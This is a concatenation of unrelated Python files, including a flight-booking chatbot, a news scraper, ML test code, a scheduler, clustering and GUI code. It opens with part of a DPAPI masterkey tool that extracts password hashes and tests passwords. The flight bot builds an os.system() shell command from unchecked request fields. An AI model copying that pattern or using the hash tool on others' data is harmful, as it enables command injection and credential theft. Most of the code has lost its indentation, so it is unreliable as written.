options = parser.parse_args()
debug = options.debug
if options.preferred and (options.masterkey or options.sid or options.context):
print ("'Preferred' option cannot be used combined with any other, exiting.")
sys.exit(1)
elif not options.preferred and not (options.masterkey and options.sid and options.context):
print ("masterkey file, SID and context are mandatory in order to extract hash from masterkey file, exiting.")
sys.exit(1)
elif options.preferred:
Preferred = open(options.preferred,'rb')
display_masterkey(Preferred)
Preferred.close()
sys.exit(1)
else:
mkp = MasterKeyPool()
masterkeyfile = open(options.masterkey,'rb')
mkdata = masterkeyfile.read()
masterkeyfile.close()
mkp.addMasterKey(mkdata, SID=options.sid, context=options.context)
if options.password:
print (mkp.try_credential(options.sid, options.password, options.context))
|
# coding: utf-8
class Task:
pass
|
import sklearn.ensemble
from autosklearn.pipeline.components.classification.gradient_boosting import \
GradientBoostingClassifier
from .test_base import BaseClassificationComponentTest
class GradientBoostingComponentTest(BaseClassificationComponentTest):
__test__ = True
res = dict()
res["default_iris"] = 0.93999999999999995
res["default_iris_iterative"] = 0.95999999999999996
res["default_iris_proba"] = 0.36351844058108812
res["default_iris_sparse"] = -1
res["default_digits"] = 0.87795992714025506
res["default_digits_iterative"] = 0.78324225865209474
res["default_digits_binary"] = 0.99089253187613846
res["default_digits_multilabel"] = -1
res["default_digits_multilabel_proba"] = -1
    sk_mod = sklearn.ensemble.GradientBoostingClassifier
module = GradientBoostingClassifier |
from setuptools import setup
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
install_requires = ['boto3', 'pandas<0.25.0', 'gokart>=0.2.4', 'tqdm']
setup(
name='thunderbolt',
use_scm_version=True,
setup_requires=["setuptools_scm"],
description='gokart file downloader',
long_description=long_description,
long_description_content_type="text/markdown",
license='MIT',
author='6syun9',
author_email='[email protected]',
url='https://vaaaaanquish.jp',
install_requires=install_requires,
packages=['thunderbolt'],
package_dir={'thunderbolt': 'thunderbolt'},
platforms='any',
tests_require=['moto==1.3.6'],
test_suite='test',
package_data={'thunderbolt': ['*.py']},
classifiers=['Programming Language :: Python :: 3.6'],
)
|
default = False
actions = 'store_true'
ENC = 'utf-8' |
#!/usr/bin/env python
class DemoAdd:
@staticmethod
def add(x, y):
return x + y
def main():
print "trigger"
print "hi"
demo = DemoAdd()
print demo.add(3, 4)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
import scrapy
from scrapy_news.items import SoccerNewsItem
import scrapy_news.url_selector as url_selector
#to run
#scrapy crawl bbc
class BBCSpider(scrapy.Spider):
name = 'bbc'
allowed_domains = ['bbc.com']
source = 'BBC'
start_urls = url_selector.get_urls(source)
def parse(self, response):
url = response.url
datetime = response.css(".abbr-on ::text").extract_first()
headline = response.css(".story-headline ::text").extract_first()
subhead = response.css(".sp-story-body__introduction ::text").extract_first()
author = ""
body_text = " ".join(response.css(".story-body p ::text").extract())
body_text = body_text.replace("Media playback is not supported on this device", "")
body_text = body_text.replace(" Find all the latest football transfers on our dedicated page.", "")
body_text = body_text.replace(subhead, "")
notice = SoccerNewsItem(
headline=headline, subhead=subhead,
author=author, body_text=body_text,
url=url, datetime=datetime,
source=self.name)
yield notice
|
# /index.py
from flask import Flask, request, jsonify, render_template
import os
import dialogflow
import requests
import json
import pusher
import json
import pytz
import dateutil.parser
from datetime import date, time, datetime
import pprint
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
flight_list = []
url = ""
destination = ""
@app.route('/get_flight_details', methods=['POST'])
def get_flight_details():
global flight_list, url, destination
data = request.get_json(silent=True)
print(data['queryResult']['action'])
if data['queryResult']['action'] == "bookflight":
source = data['queryResult']['parameters']['source']
destination = data['queryResult']['parameters']['destination']
passengers = data['queryResult']['parameters']['passengers']
date = data['queryResult']['parameters']['date']
time_of_day = data['queryResult']['parameters']['time']
url = "http://flights.makemytrip.com/makemytrip/search/O/O/E/" + str(int(passengers)) + "/0/0/S/V0/" + str(source) + "_" + str(destination) + "_" + dateutil.parser.parse(date).strftime("%d-%m-%Y")
os.system("python2.7 scrape-makemytrip.py {0} {1} {2} {3}".format(source,destination,date,passengers))
flight_list = []
with open("out.json",'r') as file:
flights_dict = json.load(file)
for flight in flights_dict:
#print(flight["le"][0]["d"],destination)
if (flight["le"][0]["d"] != destination):
continue
if time_of_day == "earlymorning":
if (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()>time(5,00)) and (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()<time(8,59)):
flight_list.append(flight)
elif time_of_day == "morning":
if (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()>time(9,00)) and (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()<time(11,59)):
flight_list.append(flight)
elif time_of_day == "afternoon":
if (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()>time(12,00)) and (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()<time(16,59)):
flight_list.append(flight)
elif time_of_day == "evening":
if (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()>time(17,00)) and (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()<time(19,29)):
flight_list.append(flight)
elif time_of_day == "night":
if (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()>time(19,30)) and (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()<time(22,59)):
flight_list.append(flight)
elif time_of_day == "latenight":
if (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()>time(23,00)) and (datetime.strptime(flight["le"][0]["fdt"],"%H:%M").time()<time(4,59)):
flight_list.append(flight)
#print(flight_list)
reply = {
"fulfillmentText": "Please wait while I search for the available flights. In the meantime, would you like to know more about your destination?",
}
return jsonify(reply)
elif data['queryResult']['action'] == "BookFlight.destinfo":
#destination = ""
pp = pprint.PrettyPrinter(indent=4)
#pp.pprint(data['queryResult'])
print(data['queryResult']['outputContexts'],"\n")
print(data['queryResult']['outputContexts'][0],"\n")
print(data['queryResult']['outputContexts'][1],"\n")
outputContexts_list = data['queryResult']['outputContexts']
#nonlocal destination
# for outputContext_dict in outputContexts_list:
# #nonlocal destination
# if outputContext_dict["name"] == "bookflight-followup":
# destination = outputContext_dict['parameters']['destination']
print(destination,"\n")
with open("destfact.json",'r') as file:
destfact_list = json.loads(file.read())
print(destfact_list)
response = "Here is some information about your destination.<br><br>"
for destfact in destfact_list:
if destfact["code"] == destination:
response += destfact["info"]
response += "<br><br>Here are some fun facts about the city:<br><ul>"
for destfunfact in destfact["facts"]:
response+=("<li>"+destfunfact+"</li>")
response += "</ul>"
response +="<br><br>I have procured the details of the flights, would you like to see them now?"
reply = {
"fulfillmentText": response,
}
return jsonify(reply)
elif data['queryResult']['action'] == "BookFlight.destinfo.displaydetails":
response = """
These are the cheapest flights according to your preferences:
<ol>
"""
for flight in flight_list:
response += """
<li><a href = "{8}" >Rs. {0} - {1} flight {2}-{3} travelling from {4} to {5} on {6} at {7}. </li>
""".format(flight["af"] , flight["le"][0]["an"] , flight["le"][0]["fn"] , flight["le"][0]["oc"] , flight["le"][0]["f"] , flight["le"][0]["t"] , dateutil.parser.parse(flight["le"][0]["dep"]).strftime('%d / %m / %Y') , flight["le"][0]["fdt"] , url)
response += """
</ol>
"""
reply = {
"fulfillmentText": response,
}
return jsonify(reply)
def detect_intent_texts(project_id, session_id, text, language_code):
session_client = dialogflow.SessionsClient()
session = session_client.session_path(project_id, session_id)
if text:
text_input = dialogflow.types.TextInput(
text=text, language_code=language_code)
query_input = dialogflow.types.QueryInput(text=text_input)
response = session_client.detect_intent(
session=session, query_input=query_input)
return response.query_result.fulfillment_text
@app.route('/send_message', methods=['POST'])
def send_message():
message = request.form['message']
project_id = os.getenv('DIALOGFLOW_PROJECT_ID')
fulfillment_text = detect_intent_texts(project_id, "unique", message, 'en')
response_text = { "message": fulfillment_text }
return jsonify(response_text)
# run Flask app
if __name__ == "__main__":
app.run() |
from time import time_ns
from pyprocessing.utils import SingletonMeta
class RenderersDelegate:
    """Fans a single method call out to every renderer.

    For each public method found on ``getattr(renderer, render_attr)``, an equally
    named method is created on this object that forwards the call, with its
    arguments, to the same attribute of every renderer in turn."""

    def __init__(self, renderers, render_attr):
self.renderers = renderers
self.render_attr = render_attr
methods = (
m
for r in self.renderers
for m in dir(getattr(r, render_attr))
if not m.startswith('__')
)
for method in methods:
if not hasattr(self, method):
setattr(
self, method,
lambda *a, m=method, **kw: self.__delegate(
m, *a, **kw
)
)
def __delegate(self, mname, *args, **kwargs):
print(mname, args, kwargs)
for r in self.renderers:
getattr(getattr(r, self.render_attr), mname)(*args, **kwargs)
class PyProcessing(metaclass=SingletonMeta):
def __init__(self):
self.width = 640
self.height = 480
self.start_time_ns = 0
self.namespace = {}
self.renderers = []
def attach_renderer(self, renderer_class):
renderer = renderer_class(self)
renderer.init()
self.renderers.append(renderer)
def start(self):
for renderer in self.renderers:
renderer.start()
self.start_time_ns = time_ns()
@property
def windows(self):
return RenderersDelegate(self.renderers, 'window')
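# A minimal usage sketch; _DemoWindow and _DemoRenderer are hypothetical stand-ins
# that expose the interface PyProcessing expects: init()/start() plus a `window`
# attribute whose methods the RenderersDelegate fans out to.
class _DemoWindow:
    def resize(self, width, height):
        print(f"window resized to {width}x{height}")


class _DemoRenderer:
    def __init__(self, pp):
        self.pp = pp
        self.window = _DemoWindow()

    def init(self):
        pass

    def start(self):
        pass


if __name__ == '__main__':
    pp = PyProcessing()
    pp.attach_renderer(_DemoRenderer)
    pp.start()
    pp.windows.resize(pp.width, pp.height)  # delegated to every renderer's window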
|
from tortoise import Tortoise
from tortoise.contrib import test
class TestCapabilities(test.TortoiseTransactionedTestModelsTestCase):
# pylint: disable=E1101
def setUp(self):
self.db = Tortoise.get_db_client("models")
self.caps = self.db.capabilities
def test_str(self):
self.assertIn("requires_limit", str(self.caps))
def test_immutability_1(self):
self.assertIsInstance(self.caps.dialect, str)
with self.assertRaises(AttributeError):
self.caps.dialect = "foo"
@test.expectedFailure
@test.requireCapability(connection_name="other")
def test_connection_name(self):
# Will fail with a `KeyError` since the connection `"other"` does not exist.
pass
@test.requireCapability(dialect="sqlite")
@test.expectedFailure
def test_actually_runs(self):
self.assertTrue(False) # pylint: disable=W1503
def test_attribute_error(self):
with self.assertRaises(AttributeError):
self.caps.bar = "foo"
@test.requireCapability(dialect="sqlite")
def test_dialect_sqlite(self):
self.assertEqual(self.caps.dialect, "sqlite")
@test.requireCapability(dialect="mysql")
def test_dialect_mysql(self):
self.assertEqual(self.caps.dialect, "mysql")
@test.requireCapability(dialect="postgres")
def test_dialect_postgres(self):
self.assertEqual(self.caps.dialect, "postgres")
|
#!/usr/bin/python
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from sklearn.neighbors import KernelDensity
# import scikitlearn
######################################################################
# gaussian based density estimation for the target feature (SalePrice)
######################################################################
def display_sell_price():
saleprice_values = df_numerical[target_feature].values.copy()
# compute mean and var for saleprice_values
min_saleprice = np.min(saleprice_values)
range_saleprice = np.max(saleprice_values) - min_saleprice
reduced_saleprice_values = (saleprice_values.copy()-min_saleprice)/range_saleprice
reduced_saleprice_values = reduced_saleprice_values.reshape(-1,1)
    # density estimation for the value distribution
kde = KernelDensity(kernel='gaussian', bandwidth=0.05).fit(reduced_saleprice_values)
proba = np.exp(kde.score_samples(reduced_saleprice_values))
y_pos = 1 + proba*0.04*(np.random.normal(size = len(proba))-0.5)
lin_values = np.linspace(np.min(reduced_saleprice_values)-0.5, np.max(reduced_saleprice_values)+0.5, 100)
lin_values_2 = lin_values.copy()
lin_values_2 = lin_values_2*range_saleprice + min_saleprice
lin_values = lin_values.reshape(-1,1)
lin_proba = np.exp(kde.score_samples(lin_values))*0.1
plt.fill(np.concatenate((lin_values_2, lin_values_2[::-1])), np.concatenate((2-lin_proba, (2+lin_proba)[::-1]) ), facecolor='green', edgecolor='orangered', alpha=0.5, linewidth=1)
plt.scatter(saleprice_values, y_pos, s=1, marker = '.', c='k' )
plt.boxplot(saleprice_values, vert=False, positions = [3], widths = [0.5], sym = 'r+')
plt.ylim(0,4)
plt.xlim(0, np.max(saleprice_values))
plt.title('SalePrice values')
return
######################################################################
# plot a column values vs the values of the target
######################################################################
def plot_col_vs_target(dataframe, col, target_feature):
df_temp = dataframe[[col, target_feature]]
df_temp = df_temp.dropna()
plt.scatter(df_temp[col], df_temp[target_feature], marker = 'x')
plt.title(col + ' vs SalePrice')
return
######################################################################
# compute correlations between all pairs of numerical features
######################################################################
def compute_correlations(df_numerical):
print('test')
features = df_numerical.columns
size = len(features)
corr_matrix = np.ones((size, size))
for ind in range(size):
for ind2 in range(ind+1, size):
df_temp = df_numerical[[features[ind], features[ind2]]]
df_temp = df_temp.dropna()
corr_matrix[ind][ind2] = np.corrcoef(df_temp[features[ind]], df_temp[features[ind2]])[0, 1]
corr_matrix[ind2][ind] = corr_matrix[ind][ind2]
return corr_matrix
plt.rcParams.update({'font.size': 5})
df = pd.read_csv('data/train.csv')
# remove the ID
df.set_index('Id', inplace=True)
df.index.rename(None, inplace=True)
# print(df)
# select numerical variables
df.dtypes
df_numerical = df.select_dtypes(include = 'number')
df_numerical.columns
# Hold on, 'MSSubClass' is also a categorical variable
df_numerical = df_numerical.drop('MSSubClass', axis=1)
print(df_numerical.columns)
# look for nan values, get corresponding column's names
df_2 = df_numerical.isna().any()
# print(df_2['LotFrontage'])
# print(df_2)
numerical_na_col = [elt for elt in df_2.index if df_2[elt]]
numerical_not_na_col = [elt for elt in df_2.index if not df_2[elt]]
# print(numerical_na_col)
# print(numerical_not_na_col)
target_feature = numerical_not_na_col[-1]
print('target feature: ' + target_feature)
# plot data for SalePrice only (boxplot and scatter plot)
# plt.subplot(2,2,1)
# display_sell_price()
numerical_not_na_col_2 = numerical_not_na_col[:len(numerical_not_na_col)-1].copy()
indexes = [ind for ind in range(len(numerical_not_na_col_2))]
# compute correlation with salePrice with features not containing na
corr = []
for col in numerical_not_na_col_2:
corr.append(np.corrcoef(df_numerical[col], df_numerical[target_feature])[0, 1])
# sort
indexes = [x for _,x in sorted(zip(corr,indexes))]
print('n elt: ' + str(len(indexes)))
# consider 0 as missing values: EnclosedPorch, BsmtFinSF2, 3SsnPorch, PoolArea, ScreenPorch, BsmtUnfSF (few), OpenPorchSF, 2ndFlrSF, WoodDeckSF, BsmtFinSF1, YearRemodAdd, TotalBsmtSF, GarageArea
# create categorical variables when few values: KitchenAbvGr, LowQualFinSF, MiscVal, BsmtHalfBath, BsmtFullBath, HalfBath, Fireplaces, FullBath
# categorical with a lot of values: OverallCond (~), YrSold, MoSold, BedroomAbvGr, TotRmsAbvGrd, GarageCars (~)
# compute correlation with missing values
corr2 = []
indexes_2 = [ind for ind in range(len(numerical_na_col))]
for col in numerical_na_col:
# print(col)
df_temp = df_numerical[[col, target_feature]]
df_temp = df_temp.dropna()
# print(df_temp)
corr2.append(np.corrcoef(df_temp[col], df_temp[target_feature])[0, 1])
# sort
indexes_2 = [x for _,x in sorted(zip(corr2,indexes_2))]
print(corr2)
# ncol = 6
# nrow = 3
# create a grid of plots for correlations
# for ind_plot in range(1,ncol*nrow+1):
# selected_feature = numerical_not_na_col_2[indexes[-ind_plot]]
# plt.subplot(nrow,ncol,ind_plot)
# plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
# plot_col_vs_target(df_numerical, selected_feature, target_feature)
# https://matplotlib.org/3.1.3/gallery/images_contours_and_fields/image_annotated_heatmap.html
corr_matrix = compute_correlations(df_numerical)
# print(corr_matrix)
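# Cross-check (a sketch): pandas' DataFrame.corr computes the same pairwise Pearson
# correlations, excluding NaNs pair by pair, so it should closely match corr_matrix.
corr_matrix_pd = df_numerical.corr().to_numpy()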
plt.rcParams.update({'font.size': 8})
fig, ax = plt.subplots()
ax.imshow(corr_matrix, interpolation='nearest')
numrows,numcols = corr_matrix.shape
# ax.format_coord = format_coord
# We want to show all ticks...
ax.set_xticks(np.arange(numrows))
ax.set_yticks(np.arange(numcols))
# ... and label them with the respective list entries
ax.set_xticklabels(df_numerical.columns)
ax.set_yticklabels(df_numerical.columns)
plt.setp(ax.get_xticklabels(), rotation=90, ha="right", rotation_mode="anchor")
plt.show()
|
from signal import SIGTERM
from os import kill, getpid
from multiprocess import Process
from simple_scheduler.base import Schedule
class Recurring(Schedule):
""" Recurring tasks are those that occur after every "x"-seconds.
(e.g. script_1 is called every 600 seconds)"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def _schedule(self, function, tz, start, stop,
period_in_seconds, number_of_reattempts,
reattempt_duration_in_seconds):
"""
Parameters
----------
function : a callable function
tz : str
standard time zone (call the method .timezones() for more info)
start : str
of the form "Month DD HH:MM:SS YYYY" (eg. "Dec 31 23:59:59 2021")
stop : str
of the form "Month DD HH:MM:SS YYYY" (eg. "Dec 31 23:59:59 2021")
period_in_seconds : int
the time period in seconds
number_of_reattempts : int
            each event is attempted this many times, but executed only once
reattempt_duration_in_seconds : int
duration to wait (in seconds) after un-successful attempt
Returns
-------
None.
"""
while True:
try:
continue_ = self._execute(
tz=tz,
start=start,
stop=stop,
function=function,
period_in_seconds=period_in_seconds,
number_of_reattempts=number_of_reattempts,
reattempt_duration_in_seconds=reattempt_duration_in_seconds
)
if continue_:
continue
else:
break
except Exception as e:
self._print(str(e))
                [p.terminate() for p in self._workers]
                self._workers = []
def add_job(self,
target,
period_in_seconds,
tz="GMT",
start=None,
stop=None,
job_name=None,
number_of_reattempts=0,
reattempt_duration_in_seconds=0,
args=(),
kwargs={}):
"""
        Assigns a periodic task to a process.
Parameters
----------
target : a callable function
period_in_seconds : int
the time period in seconds to execute this function
tz : str, optional
standard time zone (call the method .timezones() for more info)
the default is "GMT"
start : str, optional
of the form "Month DD HH:MM:SS YYYY" (eg. "Dec 31 23:59:59 2021")
the default is None
stop : str, optional
of the form "Month DD HH:MM:SS YYYY" (eg. "Dec 31 23:59:59 2021")
the default is None
job_name : str, optional
used to identify a job, defaults to name of the function
to remove jobs use this name
args : tuple(object,), optional
            un-named arguments for the "target" callable
the default is ()
kwargs : dict{key:object}, optional
            named arguments for the "target" callable
the default is {}
number_of_reattempts : int, optional
default is 0
            each recurring event is attempted this many times, but executed only once
reattempt_duration_in_seconds : int, optional
default is 0 secs
duration to wait (in seconds) after un-successful attempt
Returns
-------
None.
"""
        if not isinstance(reattempt_duration_in_seconds, (int, float)):
            raise Exception("reattempt_duration_in_seconds(seconds) should be"+\
                            " either int or float")
        if reattempt_duration_in_seconds*number_of_reattempts >= period_in_seconds:
            print("(reattempt_duration_in_seconds * number_of_reattempts) must be less"+\
                  " than (period_in_seconds)")
        self._validate_start_stop(start, stop)
function, job_name = self._manifest_function(target,
job_name,
args,
kwargs)
self._jobs[job_name] = [f"{job_name} "+\
f"[recurring | {period_in_seconds}-second(s)]"]
p = Process(target=self._schedule,
name = job_name,
args=(function, tz, start, stop, period_in_seconds,
number_of_reattempts, reattempt_duration_in_seconds))
self._processes.append(p)
recurring_scheduler = Recurring(verbose=True)
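# A minimal usage sketch; _print_time and the job name are hypothetical, and the
# final call assumes the Schedule base class exposes run() to start the queued
# processes, as in the simple_scheduler package this module belongs to.
def _print_time():
    from datetime import datetime
    print(datetime.utcnow())

if __name__ == "__main__":
    recurring_scheduler.add_job(target=_print_time,
                                period_in_seconds=600,
                                job_name="print_time_every_10_minutes")
    recurring_scheduler.run()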
|
import numpy as np
import random
import csv
import matplotlib.pyplot as plt
# Load the data from a CSV file (no column header row); filename: ex_kmc.csv
def loadDataset(filename, split, trainingSet=[] , testSet=[]):
with open(filename, 'r') as csvfile:
lines = csv.reader(csvfile)
dataset = list(lines)
for x in range(len(dataset)):
for y in range(2):
dataset[x][y] = float(dataset[x][y])
if random.random() < split:
trainingSet.append(dataset[x])
else:
testSet.append(dataset[x])
def kmeans(X,k,maxIt):
numPoints,numDim=X.shape
dataSet=np.zeros((numPoints,numDim+1))
dataSet[:,:-1]=X
centroids=dataSet[np.random.randint(numPoints,size=k),:]
centroids[:,-1]=range(1,k+1)
#print("centroids:",centroids)
    iterations=0
oldCentroids=None
while not shouldStop(oldCentroids, centroids, iterations, maxIt):
oldCentroids=np.copy(centroids)
iterations+=1
updateLabels(dataSet, centroids)
centroids=getCentroids(dataSet, k)
return dataSet, centroids
def shouldStop(oldCentroids,centroids,iterations,maxIt):
if iterations>maxIt:
return True
return np.array_equal(oldCentroids, centroids)
def updateLabels(dataSet,centroids):
numPoints,numDim=dataSet.shape
for i in range(numPoints):
dataSet[i,-1]=getLabelFromClosestCentroid(dataSet[i,:-1], centroids)
def getLabelFromClosestCentroid(dataSetRow,centroids):
label=centroids[0,-1]
minDist=np.linalg.norm(dataSetRow-centroids[0,:-1])
for i in range(1,centroids.shape[0]):
dist=np.linalg.norm(dataSetRow-centroids[i,:-1])
if dist<minDist:
minDist=dist
label=centroids[i,-1]
#print("label:"+str(label))
return label
def getCentroids(dataSet,k):
result=np.zeros((k,dataSet.shape[1]))
#print("result:",result)
for i in range(1,k+1):
oneCluster=dataSet[dataSet[:,-1]==i,:-1]
#print("cluster:",oneCluster)
result[i-1,:-1]=np.mean(oneCluster,axis=0)
result[i-1,-1]=i
#print("result:",result)
return result
# novelty score = distance from each point to its nearest centroid
def getNoveltyScore(dataSetRow,centroids,k):
minDist=[]
for i in range(k):
Dist=np.linalg.norm(dataSetRow[:,:-1]-centroids[i,:-1],axis=1)
minDist.append(Dist)
NoveltyScore=np.min(minDist,axis=0)
print(minDist)
#print(NoveltyScore)
return NoveltyScore
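# Equivalent novelty score as a vectorized sketch: the distance from every point
# to its nearest centroid, computed with numpy broadcasting instead of the loop above.
def getNoveltyScoreVectorized(dataSet, centroids):
    diffs = dataSet[:, None, :-1] - centroids[None, :, :-1]
    return np.linalg.norm(diffs, axis=2).min(axis=1)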
def main():
# prepare data
trainingSet=[]
testSet=[]
split = 1
random.seed(100)
loadDataset('C:/Users/myunghoon/.spyder-py3/ex_kmc2.csv', split, trainingSet, testSet)
trainX=np.array(trainingSet)
#print('Train set: ' ,repr(len(trainingSet)))
#print('Test set: ' + repr(len(testSet)))
#print('Train set: ' ,trainingSet[0:10])
#a=trainX[:,:-1].astype(np.float)
#plt.scatter(a[:,0], a[:,1]);
    # k = number of clusters, max_iter = maximum number of iterations (hyperparameters)
k=2
max_iter=100
final_result=kmeans(trainX[:,:-1],k,max_iter)
kmeans_result=final_result[0]
centroid_result=final_result[1]
Score=getNoveltyScore(kmeans_result,centroid_result,k)
print('final cluster:',kmeans_result)
print('final centroid:',centroid_result)
print('Novelty Score:',Score)
x=kmeans_result[:,0]
y=kmeans_result[:,1]
colors=kmeans_result[:,2]
plt.figure(figsize=(7, 3), dpi=80)
plt.scatter(x, y, s=(Score**3)*3, c=colors);
plt.xticks(np.arange(-1,8,2))
plt.yticks(np.arange(-1.5,1.6,0.5))
main()
|
from PyQt5 import QtCore, QtGui, QtWidgets
from lib.Themes import app_dark_mode
from matplotlib.figure import Figure
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as Toolbar
from matplotlib.widgets import RectangleSelector
from lib.ID_Tab import create_tabID
def create_tabConfig(self):
# Set up configuration tab
self.tabWidget.addTab(self.tabID, "")
self.tabConfig = QtWidgets.QWidget()
self.tabConfig.setObjectName("tabConfig")
self.X1 = 0
self.X2 = 0
self.Y1 = 0
self.Y2 = 0
# ----- Channel Frame -----#
# Set up RGB frame, which contains channel isolation & switching functionality.
self.frameRGB = QtWidgets.QFrame(self.tabConfig)
self.frameRGB.setGeometry(QtCore.QRect(10, 20, 381, 71))
self.frameRGB.setFrameShape(QtWidgets.QFrame.Panel)
self.frameRGB.setFrameShadow(QtWidgets.QFrame.Sunken)
self.frameRGB.setLineWidth(2)
self.frameRGB.setObjectName("frameRGB")
# RGB frame label
self.labelRGB = QtWidgets.QLabel(self.frameRGB)
self.labelRGB.setGeometry(QtCore.QRect(10, 10, 221, 20))
font = QtGui.QFont()
font.setPointSize(13)
font.setBold(True)
font.setWeight(75)
self.labelRGB.setFont(font)
self.labelRGB.setObjectName("labelRGB")
# RGB radiobuttons (Red/Green/Blue/All)
self.rbRed = QtWidgets.QRadioButton(self.frameRGB)
self.rbRed.setGeometry(QtCore.QRect(20, 40, 51, 25))
font = QtGui.QFont()
font.setPointSize(12)
self.rbRed.setFont(font)
self.rbRed.setObjectName("rbRed")
self.rbGreen = QtWidgets.QRadioButton(self.frameRGB)
self.rbGreen.setGeometry(QtCore.QRect(100, 40, 71, 25))
font = QtGui.QFont()
font.setPointSize(12)
self.rbGreen.setFont(font)
self.rbGreen.setObjectName("rbGreen")
self.rbBlue = QtWidgets.QRadioButton(self.frameRGB)
self.rbBlue.setGeometry(QtCore.QRect(200, 40, 61, 25))
font = QtGui.QFont()
font.setPointSize(12)
self.rbBlue.setFont(font)
self.rbBlue.setObjectName("rbBlue")
self.rbAll = QtWidgets.QRadioButton(self.frameRGB)
self.rbAll.setGeometry(QtCore.QRect(290, 40, 61, 25))
font = QtGui.QFont()
font.setPointSize(12)
self.rbAll.setFont(font)
self.rbAll.setObjectName("rbAll")
# ----- Cropping Frame ----- #
# Set up crop frame which contains crop information. Functionality for crop is in the graphics widget.
self.frameCrop = QtWidgets.QFrame(self.tabConfig)
self.frameCrop.setGeometry(QtCore.QRect(10, 100, 381, 131))
self.frameCrop.setFrameShape(QtWidgets.QFrame.Panel)
self.frameCrop.setFrameShadow(QtWidgets.QFrame.Sunken)
self.frameCrop.setLineWidth(2)
self.frameCrop.setObjectName("frameCrop")
# Label which titles the crop frame
self.labelCropTitle = QtWidgets.QLabel(self.frameCrop)
self.labelCropTitle.setGeometry(QtCore.QRect(10, 10, 81, 20))
font = QtGui.QFont()
font.setPointSize(13)
font.setBold(True)
font.setWeight(75)
self.labelCropTitle.setFont(font)
self.labelCropTitle.setObjectName("labelCropTitle")
# Label giving instruction on how to set a crop region
self.labelCrop = QtWidgets.QLabel(self.frameCrop)
self.labelCrop.setGeometry(QtCore.QRect(40, 40, 291, 31))
font = QtGui.QFont()
font.setPointSize(12)
self.labelCrop.setFont(font)
self.labelCrop.setObjectName("labelCrop")
# Label giving crop co-ordinate information. This is saved as a variable.
self.labelCoords = QtWidgets.QLabel(self.frameCrop)
self.labelCoords.setGeometry(QtCore.QRect(40, 70, 291, 31))
font = QtGui.QFont()
font.setPointSize(12)
self.labelCoords.setFont(font)
self.labelCoords.setObjectName("labelCoords")
# Set up graphics widget
self.graphicConfig = QtWidgets.QGraphicsView(self.tabConfig)
self.graphicConfig.setGeometry(QtCore.QRect(0, 290, 801, 441))
self.graphicConfig.setObjectName("graphicConfig")
# ----- Downsampling Frame ----- #
# Set up downsampling frame, which contains downsampling functionality
self.frameDownsample = QtWidgets.QFrame(self.tabConfig)
self.frameDownsample.setGeometry(QtCore.QRect(400, 100, 381, 131))
self.frameDownsample.setFrameShape(QtWidgets.QFrame.Panel)
self.frameDownsample.setFrameShadow(QtWidgets.QFrame.Sunken)
self.frameDownsample.setLineWidth(2)
self.frameDownsample.setObjectName("frameDownsample")
# Label for DS frame title.
self.labelDS = QtWidgets.QLabel(self.frameDownsample)
self.labelDS.setGeometry(QtCore.QRect(10, -1, 141, 31))
font = QtGui.QFont()
font.setPointSize(13)
font.setBold(True)
font.setWeight(75)
self.labelDS.setFont(font)
self.labelDS.setObjectName("labelDS")
# Labels and Entries for downsampling functionality.
self.entryY1 = QtWidgets.QLineEdit(self.frameDownsample)
self.entryY1.setGeometry(QtCore.QRect(70, 90, 113, 32))
self.entryY1.setObjectName("entryY1")
self.entryX1 = QtWidgets.QLineEdit(self.frameDownsample)
self.entryX1.setGeometry(QtCore.QRect(70, 50, 113, 32))
self.entryX1.setObjectName("entryX1")
self.entryX2 = QtWidgets.QLineEdit(self.frameDownsample)
self.entryX2.setGeometry(QtCore.QRect(250, 50, 113, 32))
self.entryX2.setObjectName("entryX2")
self.entryY2 = QtWidgets.QLineEdit(self.frameDownsample)
self.entryY2.setGeometry(QtCore.QRect(250, 90, 113, 32))
self.entryY2.setObjectName("entryY2")
self.labelDSImage = QtWidgets.QLabel(self.frameDownsample)
self.labelDSImage.setGeometry(QtCore.QRect(90, 30, 91, 20))
self.labelDSImage.setObjectName("labelDSImage")
self.labelDSNew = QtWidgets.QLabel(self.frameDownsample)
self.labelDSNew.setGeometry(QtCore.QRect(250, 30, 111, 20))
self.labelDSNew.setObjectName("labelDSNew")
self.labelDSX1 = QtWidgets.QLabel(self.frameDownsample)
self.labelDSX1.setGeometry(QtCore.QRect(10, 50, 62, 31))
self.labelDSX1.setObjectName("labelDSX1")
self.labelDSX2 = QtWidgets.QLabel(self.frameDownsample)
self.labelDSX2.setGeometry(QtCore.QRect(190, 50, 62, 31))
self.labelDSX2.setObjectName("labelDSX2")
self.labelDSY2 = QtWidgets.QLabel(self.frameDownsample)
self.labelDSY2.setGeometry(QtCore.QRect(190, 90, 62, 31))
self.labelDSY2.setObjectName("labelDSY2")
self.labelDSY1 = QtWidgets.QLabel(self.frameDownsample)
self.labelDSY1.setGeometry(QtCore.QRect(10, 90, 62, 31))
self.labelDSY1.setObjectName("labelDSY1")
# ----- Rotation Frame ----- #
# Set up rotation frame which contains rotation functionality.
self.frameRotate = QtWidgets.QFrame(self.tabConfig)
self.frameRotate.setGeometry(QtCore.QRect(400, 20, 381, 71))
self.frameRotate.setFrameShape(QtWidgets.QFrame.Panel)
self.frameRotate.setFrameShadow(QtWidgets.QFrame.Sunken)
self.frameRotate.setLineWidth(2)
self.frameRotate.setObjectName("frameRotate")
# Label which titles rotational frame
self.labelRotate = QtWidgets.QLabel(self.frameRotate)
self.labelRotate.setGeometry(QtCore.QRect(10, 10, 151, 20))
